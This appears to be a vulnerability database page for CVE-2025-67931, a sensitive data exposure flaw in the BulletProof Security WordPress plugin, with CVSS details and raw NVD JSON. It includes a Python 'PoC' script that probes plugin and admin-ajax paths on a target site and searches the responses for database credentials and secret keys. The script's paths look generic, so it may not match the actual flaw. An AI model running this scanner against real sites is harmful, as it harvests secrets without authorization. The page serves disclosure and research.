Security Vulnerability Report
中文
CVE-2025-67931 CVSS 7.5 HIGH

CVE-2025-67931

Published: 2026-01-08 10:15:52
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data.This issue affects BulletProof Security: from n/a through <= 6.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BulletProof Security <= 6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67931 PoC - BulletProof Security Sensitive Data Exposure import requests import re import sys from urllib.parse import urljoin def check_bps_plugin(url): """Check if BulletProof Security plugin is installed and vulnerable""" # Common paths for BPS plugin paths = [ '/wp-content/plugins/bulletproof-security/admin/htaccess/protect.php', '/wp-content/plugins/bulletproof-security/admin/logs/', '/wp-content/plugins/bulletproof-security/admin/dbBackup/index.php', '/wp-content/plugins/bulletproof-security/admin/options.php', '/wp-content/plugins/bulletproof-security/includes/functions.php', '/?bps_params=test', '/wp-admin/admin-ajax.php?action=bps_log_reader' ] print(f"[*] Scanning target: {url}") print(f"[*] CVE-2025-67931 - BulletProof Security Sensitive Data Exposure\n") leaked_data = [] for path in paths: target_url = urljoin(url, path) try: response = requests.get(target_url, timeout=10, verify=False) # Check for sensitive information patterns patterns = [ r'DB_NAME', r'DB_USER', r'DB_PASSWORD', r'AuthKey', r'secret', r'password', r'\$wp_roles', r'admin_email', r'NONCE_KEY', r'SECURE_AUTH_KEY' ] for pattern in patterns: if re.search(pattern, response.text, re.IGNORECASE): leaked_data.append({ 'url': target_url, 'pattern': pattern, 'snippet': response.text[:500] }) print(f"[!] Potential leak found at: {target_url}") print(f"[!] Matched pattern: {pattern}") print(f"[+] Response snippet: {response.text[:200]}...\n") break except requests.RequestException as e: print(f"[-] Request failed for {target_url}: {e}") if leaked_data: print(f"\n[!] Vulnerable! Found {len(leaked_data)} potential data leaks") return True else: print("[*] No obvious leaks detected, manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] else: target_url = input("Enter target URL: ").strip() check_bps_plugin(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67931", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:52.127", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data.This issue affects BulletProof Security: from n/a through <= 6.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bulletproof-security/vulnerability/wordpress-bulletproof-security-plugin-6-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}